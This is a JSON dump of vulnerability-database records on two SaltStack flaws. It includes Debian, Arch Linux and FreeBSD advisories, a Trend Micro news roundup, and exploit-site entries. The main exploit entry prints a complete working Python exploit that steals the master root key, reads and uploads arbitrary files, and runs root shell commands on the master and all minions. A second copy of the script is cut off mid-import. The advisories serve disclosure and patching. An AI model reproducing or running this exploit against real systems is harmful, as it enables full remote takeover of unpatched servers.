"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-06T04:15:33", "id": "DEBIAN:DSA-4676-1:8BF11", "href": "https://lists.debian.org/debian-security-announce/2020/msg00079.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2020-05-29T15:51:50", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how, over the past five years, the cybercriminal underground has seen a major shift to new platforms, communications channels, products, and services. Also, read about a new wave of Sandworm cyberattacks against email servers conducted by one of Russia's most advanced cyber-espionage units.\n\nRead on:\n\n[**How the Cybercriminal Underground Has Changed in 5 Years**](<https://blog.trendmicro.com/how-the-cybercriminal-underground-has-changed-in-5-years/>)\n\n_Trend Micro has been profiling the underground cybercrime community for many years. Over the past five years, it has seen a major shift to new platforms, communications channels, products, and services, as trust on the dark web erodes and new market demands emerge. Trend Micro expects the current pandemic to create yet another evolution, as cyber-criminals look to take advantage of new ways of working and systemic vulnerabilities._\n\n[**Shadowserver, an Internet Guardian, Finds a Lifeline**](<https://www.wired.com/story/shadowserver-funding-trend-micro-internet-society/>)\n\n_In March, internet security group Shadowserver_ _learned that longtime corporate sponsor Cisco was ending its support. With just weeks to raise hundreds of thousands of dollars to move its data center out of Cisco's facility\u2014not to mention an additional $1.7 million to make it through the year\u2014the organization was at real risk of extinction. Ten weeks later, Shadowserver has come a long way toward securing its financial future. This week, Trend Micro committed $600,000 to Shadowserver over three years, providing an important backbone to the organization's fundraising efforts. _\n\n[**#LetsTalkSecurity: No Trust for the Wicked**](<https://trendtalks.fyi/security/>)** **\n\n_This Week, Rik Ferguson, vice president of Security Research at Trend Micro, hosted the fourth episode of #LetsTalkSecurity featuring guest Dave Lewis, Global Advisory CISO at Duo Security. Check out this week\u2019s episode and follow the link to find information about upcoming episodes and guests._\n\n[**Principles of a Cloud Migration \u2013 Security W5H \u2013 The HOW**](<https://blog.trendmicro.com/principles-of-a-cloud-migration-security-w5h-the-how/>)\n\n_Security needs to be treated much like DevOps in evolving organizations, meaning everyone in the company has a shared responsibility to make sure it is implemented. It is not just a part of operations, but a cultural shift in doing things right the first time \u2013 security by default. In this blog from Trend Micro, learn 3 tips to get you started on your journey to securing the cloud. _\n\n[**What\u2019s Trending on the Underground Market?**](<https://www.helpnetsecurity.com/2020/05/27/underground-market-trends/>)\n\n_Trust has eroded among criminal interactions in the underground markets, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, a new Trend Micro report reveals._ _Determined efforts by law enforcement appear to be having an impact on the cybercrime underground as several forums have been taken down by global police entities. _\n\n[**Is Cloud Computing Any Safer from Malicious Hackers?**](<https://blog.trendmicro.com/is-cloud-computing-any-safer-from-malicious-hackers/>)\n\n_Cloud computing has revolutionized the IT world, making it easier for companies to deploy infrastructure and applications and deliver their services to the public. The idea of not spending millions of dollars on equipment and facilities to host an on-premises data center is a very attractive prospect to many. But is cloud computing any safer from malicious threat actors? Read this blog from Trend Micro to find out. _\n\n[**Smart Yet Flawed: IoT Device Vulnerabilities Explained**](<https://www.trendmicro.com/vinfo/us/security/news/internet-of-things/smart-yet-flawed-iot-device-vulnerabilities-explained>)\n\n_The variety and range of functions of smart devices present countless ways of improving different industries and environments. While the \u201cthings\u201d in the internet of things (IoT) benefits homes, factories, and cities, these devices can also introduce blind spots and security risks in the form of vulnerabilities. Vulnerable smart devices open networks to attack vectors and can weaken the overall security of the internet. For now, it is better to be cautious and understand that \u201csmart\u201d can also mean vulnerable to threats._\n\n[**Cyberattacks Against Hospitals Must Stop, Says Red Cross**](<https://www.zdnet.com/article/cyberattacks-against-hospitals-must-stop-says-red-cross/>)\n\n_Immediate action needs to be taken to stop cyberattacks targeting hospitals and healthcare organizations during the ongoing coronavirus pandemic \u2013 and governments around the world need to work together to make it happen, says a newly published open letter signed by the International Committee of the Red Cross, former world leaders, cybersecurity executives and others._\n\n[**Securing the 4 Cs of Cloud-Native Systems: Cloud, Cluster, Container, and Code**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/securing-the-4-cs-of-cloud-native-systems-cloud-cluster-container-and-code>)\n\n_Cloud-native technologies enable businesses to make the most of their cloud resources with less overhead, faster response times, and easier management._ _Like any technology that uses various interconnected tools and platforms, security plays a vital role in cloud-native computing. Cloud-native security adopts the defense-in-depth approach and divides the security strategies utilized in cloud-native systems into four different layers._\n\n[**Coinminers Exploit SaltStack Vulnerabilities CVE-2020-11651 and CVE-2020-11652**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/coinminers-exploit-saltstack-vulnerabilities-cve-2020-11651-and-cve-2020-11652>)\n\n_Researchers from F-Secure recently disclosed two high-severity vulnerabilities in SaltStack Salt: CVE-2020-11651, an authentication bypass vulnerability, and CVE-2020-11652, a directory traversal vulnerability. These can be exploited by remote, unauthenticated attackers, and all versions of SaltStack Salt before 2019.2.4 and 3000 before 3000.2 are affected. Trend Micro has witnessed attacks exploiting these vulnerabilities, notably those using cryptocurrency miners._\n\n[**PonyFinal Ransomware Targets Enterprise Servers Then Bides Its Time**](<https://threatpost.com/ponyfinal-ransomware-enterprise-servers/156083/>)\n\n_A Java-based ransomware known as PonyFinal has emerged, targeting enterprise systems management servers as an initial infection vector. It exfiltrates information about infected environments, spreads laterally and then waits before striking \u2014 the operators go on to encrypt files at a later date and time, when the likelihood of the target paying is deemed to be the most likely._\n\n[**Qakbot Resurges, Spreads through VBS Files**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/qakbot-resurges-spreads-through-vbs-files>)\n\n_Trend Micro has seen events that point to the resurgence of Qakbot, a multi-component, information-stealing threat first discovered in 2007. Feedback from Trend Micro\u2019s sensors indicates that Qakbot detections increased overall. A notable rise in detections of a particular Qakbot sample (detected by Trend Micro as Backdoor.Win32.QBOT.SMTH) was also witnessed in early April. _\n\n[**CSO Insights: SBV\u2019s Ian Keller on the Challenges and Opportunities of Working Remotely**](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/cso-insights-sbv-s-ian-keller-on-the-challenges-and-opportunities-of-working-remotely>)\n\n_The COVID-19 pandemic has forced businesses to change the way they operate. These abrupt changes come with a unique set of challenges, including security challenges. Ian Keller, Chief Security Officer of SBV Services in South Africa, sat down with Trend Micro and shared his thoughts on how SBV is coping with the current pandemic, the main challenges they faced when transitioning their staff to remote work, as well as how they plan to move forward._\n\n[**NSA Warns of New Sandworm Attacks on Email Servers**](<https://www.zdnet.com/article/nsa-warns-of-new-sandworm-attacks-on-email-servers/>)\n\n_The US National Security Agency (NSA) has published a security alert warning of a new wave of cyberattacks against email servers, attacks conducted by one of Russia's most advanced cyber-espionage units. The NSA says that members of Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, have been attacking email servers running the Exim mail transfer agent (MTA)._\n\n[**Forward-Looking Security Analysis of Smart Factories <Part 2> Security Risks of Industrial Application Stores**](<https://www.trendmicro.com/us/iot-security/news/5859/Forward_looking_security_analysis_of_smart_factories_Part_2_Security_risks_of_industrial_application_stores>)\n\n_In the second part of this five series column, Trend Micro looks at the security risks to be aware of when promoting smart factories by examining overlooked attack vectors, feasible attack scenarios, and recommended defense strategies. This column is especially applicable for architects, engineers, and developers who are involved in smart factory technology. _\n\n[**Factory Security Problems from an IT Perspective (Part 2): People, Processes, and Technology**](<https://www.trendmicro.com/us/iot-security/news/5844/Factory_Security_Problems_from_an_IT_Perspective_Part_2_People_processes_and_technology>)\n\n_This blog is the second in a series that discusses the challenges that IT departments face when they are assigned the task of overseeing cybersecurity in factories and implementing measures to overcome these challenges. In this article, Trend Micro carries out an analysis to uncover the challenges that lie in the way of promoting factory security from an IT perspective._\n\n[**21 Tips to Stay Secure, Private, and Productive as You Work from Home on Your Mac**](<https://blog.trendmicro.com/21-tips-to-stay-secure-private-and-productive-as-you-work-from-home-on-your-mac/>)\n\n_If you brought a Mac home from the office, it\u2019s likely already set up to meet your company\u2019s security policies. But what if you are using your personal Mac to work from home? You need to outfit it for business, to protect it and your company from infections and snooping, while ensuring it continues to run smoothly over time. In this blog, learn 21 tips for staying secure, private, and productive while working from home on your Mac. _\n\nSurprised by the new wave of Sandworm attacks? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers](<https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-05-29T12:27:26", "type": "trendmicroblog", "title": "This Week in Security News: How the Cybercriminal Underground Has Changed in 5 Years and the NSA Warns of New Sandworm Attacks on Email Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-29T12:27:26", "id": "TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D", "href": "https://blog.trendmicro.com/this-week-in-security-news-how-the-cybercriminal-underground-has-changed-in-5-years-and-the-nsa-warns-of-new-sandworm-attacks-on-email-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:58", "description": "Arch Linux Security Advisory ASA-202005-1\n=========================================\n\nSeverity: Critical\nDate : 2020-05-05\nCVE-ID : CVE-2020-11651 CVE-2020-11652\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1147\n\nSummary\n=======\n\nThe package salt before version 2019.2.4-1 is vulnerable to multiple\nissues including arbitrary command execution and arbitrary filesystem\naccess.\n\nResolution\n==========\n\nUpgrade to 2019.2.4-1.\n\n# pacman -Syu \"salt>=2019.2.4-1\"\n\nThe problems have been fixed upstream in version 2019.2.4.\n\nWorkaround\n==========\n\nDo not expose salt-master to the internet.\n\nDescription\n===========\n\n- CVE-2020-11651 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class does not\nproperly validate method calls. This allows a remote user to access\nsome methods without authentication. These methods can be used to\nretrieve user tokens from the salt master and/or run arbitrary commands\non salt minions.\n\n- CVE-2020-11652 (arbitrary filesystem access)\n\nAn issue was discovered in SaltStack Salt before 2019.2.4 and 3000\nbefore 3000.2. The salt-master process ClearFuncs class allows access\nto some methods that improperly sanitize paths. These methods allow\narbitrary directory access to authenticated users.\n\nImpact\n======\n\nA remote unauthenticated user can execute arbitrary commands and access\nfiles on the affected host.\n\nReferences\n==========\n\nhttps://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\nhttps://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst\nhttps://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7\nhttps://github.com/saltstack/salt/commit/cce7abad9c22d9d50ccee2813acabff8deca35dd\nhttps://security.archlinux.org/CVE-2020-11651\nhttps://security.archlinux.org/CVE-2020-11652", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-05T00:00:00", "type": "archlinux", "title": "[ASA-202005-1] salt: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "ASA-202005-1", "href": "https://security.archlinux.org/ASA-202005-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nF-Secure reports:\n\nCVE-2020-11651 - Authentication bypass vulnerabilities\nThe ClearFuncs class processes unauthenticated requests and\n\t unintentionally exposes the _send_pub() method, which can be used to\n\t queue messages directly on the master publish server. Such messages\n\t can be used to trigger minions to run arbitrary commands as root.\nThe ClearFuncs class also exposes the method _prep_auth_info(),\n\t which returns the \"root key\" used to authenticate commands from the\n\t local root user on the master server. This \"root key\" can then be\n\t used to remotely call administrative commands on the master server.\n\t This unintentional exposure provides a remote un-authenticated\n\t attacker with root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities\nThe wheel module contains commands used to read and write files\n\t under specific directory paths. The inputs to these functions are\n\t concatenated with the target directory and the resulting path is not\n\t canonicalized, leading to an escape of the intended path restriction.\nThe get_token() method of the salt.tokens.localfs class (which is\n\t exposed to unauthenticated requests by the ClearFuncs class) fails\n\t to sanitize the token input parameter which is then used as a\n\t filename, allowing insertion of \"..\" path elements and thus reading\n\t of files outside of the intended directory. The only restriction is\n\t that the file has to be deserializable by salt.payload.Serial.loads().\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "freebsd", "title": "salt -- multiple vulnerabilities in salt-master process", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "6BF55AF9-973B-11EA-9F2C-38D547003487", "href": "https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-18T23:21:36", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "zdt", "title": "Saltstack 3000.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-04T00:00:00", "id": "1337DAY-ID-34358", "href": "https://0day.today/exploit/description/34358", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\n# Exploit Author: Jasper Lievisse Adriaanse\n# Vendor Homepage: https://www.saltstack.com/\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\n# Tested on: Debian 10 with Salt 2019.2.0\n# CVE : CVE-2020-11651 and CVE-2020-11652\n# Discription: Saltstack authentication bypass/remote code execution\n#\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\n#!/usr/bin/env python\n#\n# Exploit for CVE-2020-11651 and CVE-2020-11652\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport datetime\nimport os\nimport os.path\nimport sys\nimport time\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\n\ndef init_minion(master_ip, master_port):\n minion_config = {\n 'transport': 'zeromq',\n 'pki_dir': '/tmp',\n 'id': 'root',\n 'log_level': 'debug',\n 'master_ip': master_ip,\n 'master_port': master_port,\n 'auth_timeout': 5,\n 'auth_tries': 1,\n 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n }\n\n return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n# --- check funcs ----\n\ndef check_salt_version():\n print(\"[+] Salt version: {}\".format(salt.version.__version__))\n\n vi = salt.version.__version_info__\n\n if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):\n return True\n else:\n return False\n\ndef check_connection(master_ip, master_port, channel):\n print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\n sys.stdout.flush()\n\n # connection check\n try:\n channel.send({'cmd':'ping'}, timeout=2)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"OFFLINE\")\n sys.exit(1)\n else:\n print(\"ONLINE\")\n\ndef check_CVE_2020_11651(channel):\n print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\n sys.stdout.flush()\n # try to evil\n try:\n rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n pass\n finally:\n if rets:\n root_key = rets[2]['root']\n return root_key\n\n return None\n\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'cmd': 'get_token',\n 'arg': [],\n 'token': top_secret_file_path,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"YES\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n print(\"NO\")\n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': top_secret_file_path,\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return']:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'data': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n\n pp(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\n print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\n sys.stdout.flush()\n\n # try read file\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'config.update_config',\n 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\n 'yaml_contents': 'evil',\n 'saltenv': 'base',\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except salt.exceptions.SaltReqTimeoutError:\n print(\"TIMEOUT\")\n except:\n print(\"ERROR\")\n raise\n else:\n if debug:\n print()\n print(rets)\n if rets['data']['return'].startswith('Wrote'):\n try:\n os.remove('/tmp/salt_CVE_2020_11652.conf')\n except OSError:\n print(\"Maybe?\")\n else:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef pwn_read_file(channel, root_key, path, master_ip):\n print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.read',\n 'path': path,\n 'saltenv': 'base',\n }\n\n rets = channel.send(msg, timeout=3)\n print(rets['data']['return'][0][path])\n\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\n print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\n sys.stdout.flush()\n\n try:\n fh = open(src, 'rb')\n payload = fh.read()\n fh.close()\n except Exception as e:\n print('[-] Failed to read {}: {}'.format(src, e))\n return\n\n msg = {\n 'key': root_key,\n 'cmd': 'wheel',\n 'fun': 'file_roots.write',\n 'saltenv': 'base',\n 'data': payload,\n 'path': dest,\n }\n\n rets = channel.send(msg, timeout=3)\n print('[ ] {}'.format(rets['data']['return']))\n\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': 'runner',\n 'fun': 'salt.cmd',\n 'saltenv': 'base',\n 'user': 'sudo_user',\n 'kwarg': {\n 'fun': 'cmd.exec_code',\n 'lang': 'python',\n 'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\n },\n 'jid': jid,\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n\n if rets.get('jid'):\n print('[+] Successfully scheduled job: {}'.format(rets['jid']))\n\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\n print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\n sys.stdout.flush()\n\n msg = {\n 'key': root_key,\n 'cmd': '_send_pub',\n 'fun': 'cmd.run',\n 'user': 'root',\n 'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\n 'tgt': '*',\n 'tgt_type': 'glob',\n 'ret': '',\n 'jid': jid\n }\n\n try:\n rets = channel.send(msg, timeout=3)\n except Exception as e:\n print('[-] Failed to submit job')\n return\n finally:\n if rets == None:\n print('[+] Successfully submitted job to all minions.')\n else:\n print('[-] Failed to submit job')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\n parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\n parser.add_argument('--port', '-p', dest='master_port', default='4506')\n parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\n parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\n parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\n parser.add_argument('--read', '-r', dest='read_file')\n parser.add_argument('--upload-src', dest='upload_src')\n parser.add_argument('--upload-dest', dest='upload_dest')\n parser.add_argument('--exec', dest='exec', help='Run a command on the master')\n parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\n args = parser.parse_args()\n\n print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\n time.sleep(1)\n\n # Both src and destination are required for uploads\n if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\n print('[-] Must provide both --upload-src and --upload-dest')\n sys.exit(1)\n\n channel = init_minion(args.master_ip, args.master_port)\n\n if check_salt_version():\n print(\"[ ] This version of salt is vulnerable! Check results below\")\n elif args.force:\n print(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\")\n else:\n sys.exit()\n\n check_connection(args.master_ip, args.master_port, channel)\n \n root_key = check_CVE_2020_11651(channel)\n if root_key:\n print('\\n[*] root key obtained: {}'.format(root_key))\n else:\n print('[-] Failed to find root key...aborting')\n sys.exit(127)\n\n if args.run_checks:\n # Assuming this check runs on the master itself, create a file with \"secret\" content\n # and abuse CVE-2020-11652 to read it.\n top_secret_file_path = '/tmp/salt_cve_teta'\n with salt.utils.fopen(top_secret_file_path, 'w') as fd:\n fd.write(\"top secret\")\n\n # Again, this assumes we're running this check on the master itself\n with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\n root_key = keyfd.read()\n\n check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\n check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\n check_CVE_2020_11652_write1(debug, channel, root_key)\n check_CVE_2020_11652_write2(debug, channel, root_key)\n os.remove(top_secret_file_path)\n sys.exit(0)\n\n if args.read_file:\n pwn_read_file(channel, root_key, args.read_file, args.master_ip)\n\n if args.upload_src:\n if os.path.isabs(args.upload_dest):\n print('[-] Destination path must be relative; aborting')\n sys.exit(1)\n pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\n\n\n jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\n\n if args.exec:\n pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\n\n if args.exec_all:\n print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\n time.sleep(2)\n pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/34358", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-21T11:20:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "zdt", "title": "Saltstack 3000.1 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-07T00:00:00", "id": "1337DAY-ID-34389", "href": "https://0day.today/exploit/description/34389", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\n# Date: 2020-05-04\n# Exploit Author: Jasper Lievisse Adriaanse\n# Vendor Homepage: https://www.saltstack.com/\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\n# Tested on: Debian 10 with Salt 2019.2.0\n# CVE : CVE-2020-11651 and CVE-2020-11652\n# Discription: Saltstack authentication bypass/remote code execution\n#\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\n#!/usr/bin/env python\n#\n# Exploit for CVE-2020-11651 and CVE-2020-11652\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport datetime\nimport os\nimport os.path\nimport 